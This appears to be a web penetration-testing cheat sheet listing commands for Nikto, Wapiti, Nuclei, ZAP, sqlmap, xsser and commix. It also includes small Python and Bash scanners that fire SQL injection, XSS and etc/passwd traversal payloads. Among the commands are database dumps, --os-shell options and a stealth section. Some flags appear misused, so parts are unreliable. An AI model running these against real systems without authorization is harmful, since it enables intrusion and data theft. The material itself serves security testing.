Vulnerability Scanner Tools
Vulnerability Scanner Tools Comprehensive collection of web application vulnerability scanner tools and techniques for security testing. Nikto Basic Vulnerability Scanning # Basic vulnerability scan nikto -h http://TARGET_URL # With HTTPS nikto -h https://TARGET_URL # With specific port nikto -h http://TARGET_URL -p 8080 # With multiple hosts nikto -h http://TARGET_URL1,http://TARGET_URL2 # With output file nikto -h http://TARGET_URL -o results.txt # With XML output nikto -h http://TARGET_URL -Format xml -o results.xml # With JSON output nikto -h http://TARGET_URL -Format json -o results.json # With verbose output nikto -h http://TARGET_URL -v # With silent output nikto -h http://TARGET_URL -s Advanced Nikto Options # With specific plugins nikto -h http://TARGET_URL -Plugins "apacheusers,backdoors" # With all plugins nikto -h http://TARGET_URL -Plugins all # With exclude plugins nikto -h http://TARGET_URL -Plugins "apacheusers,backdoors" -exclude "apacheusers" # With custom user agent nikto -h http://TARGET_URL -useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # With cookies nikto -h http://TARGET_URL -C "PHPSESSID=abc123" # With authentication nikto -h http://TARGET_URL -id admin:password # With proxy nikto -h http://TARGET_URL -useproxy http://127.0.0.1:8080 # With timeout nikto -h http://TARGET_URL -timeout 10 # With retries nikto -h http://TARGET_URL -retries 3 # With SSL options nikto -h https://TARGET_URL -ssl -nossl # With specific checks nikto -h http://TARGET_URL -Tuning 1,2,3,4,5,6,7,8,9,0,a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z Wapiti Basic Vulnerability Scanning # Basic vulnerability scan wapiti -u http://TARGET_URL # With HTTPS wapiti -u https://TARGET_URL # With specific port wapiti -u http://TARGET_URL:8080 # With output file wapiti -u http://TARGET_URL -o results.txt # With XML output wapiti -u http://TARGET_URL -f xml -o results.xml # With JSON output wapiti -u http://TARGET_URL -f json -o results.json # With verbose output wapiti -u http://TARGET_URL -v # With silent output wapiti -u http://TARGET_URL -s Advanced Wapiti Options # With specific modules wapiti -u http://TARGET_URL -m "sql,xss,file,exec,ssrf" # With all modules wapiti -u http://TARGET_URL -m all # With exclude modules wapiti -u http://TARGET_URL -m "sql,xss,file,exec,ssrf" -e "sql" # With custom user agent wapiti -u http://TARGET_URL -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # With cookies wapiti -u http://TARGET_URL -c "PHPSESSID=abc123" # With authentication wapiti -u http://TARGET_URL -a admin:password # With proxy wapiti -u http://TARGET_URL -p http://127.0.0.1:8080 # With timeout wapiti -u http://TARGET_URL -t 10 # With retries wapiti -u http://TARGET_URL -r 3 # With SSL options wapiti -u https://TARGET_URL -k # With specific checks wapiti -u http://TARGET_URL -c "PHPSESSID=abc123" -a "Mozilla/5.0" Nuclei Basic Vulnerability Scanning # Basic vulnerability scan nuclei -u http://TARGET_URL # With HTTPS nuclei -u https://TARGET_URL # With specific port nuclei -u http://TARGET_URL:8080 # With multiple targets nuclei -l targets.txt # With output file nuclei -u http://TARGET_URL -o results.txt # With JSON output nuclei -u http://TARGET_URL -json -o results.json # With verbose output nuclei -u http://TARGET_URL -v # With silent output nuclei -u http://TARGET_URL -silent Advanced Nuclei Options # With specific templates nuclei -u http://TARGET_URL -t templates/sql-injection.yaml # With all templates nuclei -u http://TARGET_URL -t templates/ # With exclude templates nuclei -u http://TARGET_URL -t templates/ -exclude-templates templates/sql-injection.yaml # With custom user agent nuclei -u http://TARGET_URL -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # With cookies nuclei -u http://TARGET_URL -H "Cookie: PHPSESSID=abc123" # With authentication nuclei -u http://TARGET_URL -H "Authorization: Basic YWRtaW46cGFzc3dvcmQ=" # With proxy nuclei -u http://TARGET_URL -proxy http://127.0.0.1:8080 # With timeout nuclei -u http://TARGET_URL -timeout 10 # With retries nuclei -u http://TARGET_URL -retries 3 # With SSL options nuclei -u https://TARGET_URL -k # With specific checks nuclei -u http://TARGET_URL -t templates/sql-injection.yaml -t templates/xss.yaml OWASP ZAP Basic Vulnerability Scanning # Basic vulnerability scan zap-baseline.py -t http://TARGET_URL # With HTTPS zap-baseline.py -t https://TARGET_URL # With specific port zap-baseline.py -t http://TARGET_URL:8080 # With output file zap-baseline.py -t http://TARGET_URL -r results.html # With XML output zap-baseline.py -t http://TARGET_URL -x results.xml # With JSON output zap-baseline.py -t http://TARGET_URL -J results.json # With verbose output zap-baseline.py -t http://TARGET_URL -v # With silent output zap-baseline.py -t http://TARGET_URL -s Advanced OWASP ZAP Options # With specific policies zap-baseline.py -t http://TARGET_URL -P policy.xml # With all policies zap-baseline.py -t http://TARGET_URL -P all # With exclude policies zap-baseline.py -t http://TARGET_URL -P policy.xml -e "sql-injection,xss" # With custom user agent zap-baseline.py -t http://TARGET_URL -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # With cookies zap-baseline.py -t http://TARGET_URL -c "PHPSESSID=abc123" # With authentication zap-baseline.py -t http://TARGET_URL -u admin:password # With proxy zap-baseline.py -t http://TARGET_URL -p http://127.0.0.1:8080 # With timeout zap-baseline.py -t http://TARGET_URL -T 10 # With retries zap-baseline.py -t http://TARGET_URL -R 3 # With SSL options zap-baseline.py -t https://TARGET_URL -k # With specific checks zap-baseline.py -t http://TARGET_URL -P policy.xml -e "sql-injection,xss" Custom Scripts Python Vulnerability Scanner import requests import threading import queue import time import re def vulnerability_scanner(url, wordlist, threads=10, delay=0): def worker(): while True: try: path = wordlist.get() if path is None: break full_url = url.rstrip('/') + '/' + path.strip() # SQL Injection check sql_payloads = ["'", "\"", "';", "\";", "' OR 1=1--", "\" OR 1=1--"] for payload in sql_payloads: test_url = full_url + "?id=" + payload response = requests.get(test_url, timeout=5) if "error" in response.text.lower() or "mysql" in response.text.lower(): print(f"[SQL Injection] {test_url}") # XSS check xss_payloads = ["<script>alert('XSS')</script>", "<img src=x onerror=alert('XSS')>"] for payload in xss_payloads: test_url = full_url + "?search=" + payload response = requests.get(test_url, timeout=5) if payload in response.text: print(f"[XSS] {test_url}") # Directory traversal check traversal_payloads = ["../", "..\\", "....//", "....\\\\"] for payload in traversal_payloads: test_url = full_url + "?file=" + payload + "etc/passwd" response = requests.get(test_url, timeout=5) if "root:" in response.text: print(f"[Directory Traversal] {test_url}") time.sleep(delay) except Exception as e: pass finally: wordlist.task_done() # Start threads for i in range(threads): t = threading.Thread(target=worker) t.daemon = True t.start() # Add paths to queue with open(wordlist_file, 'r') as f: for line in f: wordlist.put(line.strip()) # Wait for completion wordlist.join() # Usage url = "http://TARGET_URL" wordlist_file = "/usr/share/wordlists/dirb/common.txt" wordlist = queue.Queue() vulnerability_scanner(url, wordlist, threads=20, delay=0.1) Bash Vulnerability Scanner #!/bin/bash TARGET_URL="http://TARGET_URL" WORDLIST="/usr/share/wordlists/dirb/common.txt" THREADS=10 # Function to check vulnerabilities check_vulnerabilities() { local path=$1 local full_url="${TARGET_URL}/${path}" # SQL Injection check sql_payloads=("'" "\"" "';" "\";" "' OR 1=1--" "\" OR 1=1--") for payload in "${sql_payloads[@]}"; do test_url="${full_url}?id=${payload}" response=$(curl -s "$test_url") if echo "$response" | grep -qi "error\|mysql"; then echo "[SQL Injection] $test_url" fi done # XSS check xss_payloads=("<script>alert('XSS')</script>" "<img src=x onerror=alert('XSS')>") for payload in "${xss_payloads[@]}"; do test_url="${full_url}?search=${payload}" response=$(curl -s "$test_url") if echo "$response" | grep -q "$payload"; then echo "[XSS] $test_url" fi done # Directory traversal check traversal_payloads=("../" "..\\" "....//" "....\\\\") for payload in "${traversal_payloads[@]}"; do test_url="${full_url}?file=${payload}etc/passwd" response=$(curl -s "$test_url") if echo "$response" | grep -q "root:"; then echo "[Directory Traversal] $test_url" fi done } # Export function for parallel export -f check_vulnerabilities export TARGET_URL # Run parallel vulnerability check cat "$WORDLIST" | parallel -j "$THREADS" check_vulnerabilities {} Vulnerability Types SQL Injection # Basic SQL injection test sqlmap -u "http://TARGET_URL/page.php?id=1" # With POST data sqlmap -u "http://TARGET_URL/login.php" --data="username=admin&password=admin" # With cookies sqlmap -u "http://TARGET_URL/page.php?id=1" --cookie="PHPSESSID=abc123" # With headers sqlmap -u "http://TARGET_URL/page.php?id=1" --headers="User-Agent: CustomAgent" # With proxy sqlmap -u "http://TARGET_URL/page.php?id=1" --proxy="http://127.0.0.1:8080" # With authentication sqlmap -u "http://TARGET_URL/page.php?id=1" --auth-type=basic --auth-cred="admin:password" # With database enumeration sqlmap -u "http://TARGET_URL/page.php?id=1" --dbs sqlmap -u "http://TARGET_URL/page.php?id=1" --tables sqlmap -u "http://TARGET_URL/page.php?id=1" --columns -T users sqlmap -u "http://TARGET_URL/page.php?id=1" --dump -T users # With OS shell sqlmap -u "http://TARGET_URL/page.php?id=1" --os-shell XSS (Cross-Site Scripting) # Basic XSS test xsser -u "http://TARGET_URL/page.php?search=test" # With POST data xsser -u "http://TARGET_URL/login.php" --data="username=admin&password=admin" # With cookies xsser -u "http://TARGET_URL/page.php?search=test" --cookie="PHPSESSID=abc123" # With headers xsser -u "http://TARGET_URL/page.php?search=test" --headers="User-Agent: CustomAgent" # With proxy xsser -u "http://TARGET_URL/page.php?search=test" --proxy="http://127.0.0.1:8080" # With authentication xsser -u "http://TARGET_URL/page.php?search=test" --auth="admin:password" # With payloads xsser -u "http://TARGET_URL/page.php?search=test" --payload="<script>alert('XSS')</script>" # With encoding xsser -u "http://TARGET_URL/page.php?search=test" --encode Command Injection # Basic command injection test commix -u "http://TARGET_URL/page.php?cmd=test" # With POST data commix -u "http://TARGET_URL/login.php" --data="username=admin&password=admin" # With cookies commix -u "http://TARGET_URL/page.php?cmd=test" --cookie="PHPSESSID=abc123" # With headers commix -u "http://TARGET_URL/page.php?cmd=test" --headers="User-Agent: CustomAgent" # With proxy commix -u "http://TARGET_URL/page.php?cmd=test" --proxy="http://127.0.0.1:8080" # With authentication commix -u "http://TARGET_URL/page.php?cmd=test" --auth="admin:password" # With OS shell commix -u "http://TARGET_URL/page.php?cmd=test" --os-shell Best Practices Rate Limiting # Add delay between requests nikto -h http://TARGET_URL -timeout 10 # Use fewer threads nuclei -u http://TARGET_URL -t 10 # Use proxy rotation nuclei -u http://TARGET_URL -proxy http://proxy1:8080 Stealth Mode # Use random user agents nikto -h http://TARGET_URL -useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # Use realistic delays nuclei -u http://TARGET_URL -rate-limit 50 # Use smaller wordlists nuclei -u http://TARGET_URL -t templates/sql-injection.yaml Output Analysis # Save results to file nikto -h http://TARGET_URL -o results.txt # Filter by severity grep "HIGH" results.txt grep "MEDIUM" results.txt grep "LOW" results.txt # Sort by vulnerability type grep "SQL Injection" results.txt grep "XSS" results.txt grep "Command Injection" results.txt Troubleshooting Common Issues # Connection timeout nikto -h http://TARGET_URL -timeout 30 # Too many requests nuclei -u http://TARGET_URL -rate-limit 50 # Invalid SSL certificate nuclei -u https://TARGET_URL -k # Authentication required nuclei -u http://TARGET_URL -H "Authorization: Basic YWRtaW46cGFzc3dvcmQ=" Performance Optimization # Use appropriate thread count nuclei -u http://TARGET_URL -t 20 # Use smaller wordlists for initial scan nuclei -u http://TARGET_URL -t templates/sql-injection.yaml # Use specific templates nuclei -u http://TARGET_URL -t templates/sql-injection.yaml -t templates/xss.yaml Legal and Ethical Considerations Always obtain proper authorization before testing Respect rate limits and server resources Use appropriate tools for the target Document findings properly Follow responsible disclosure practices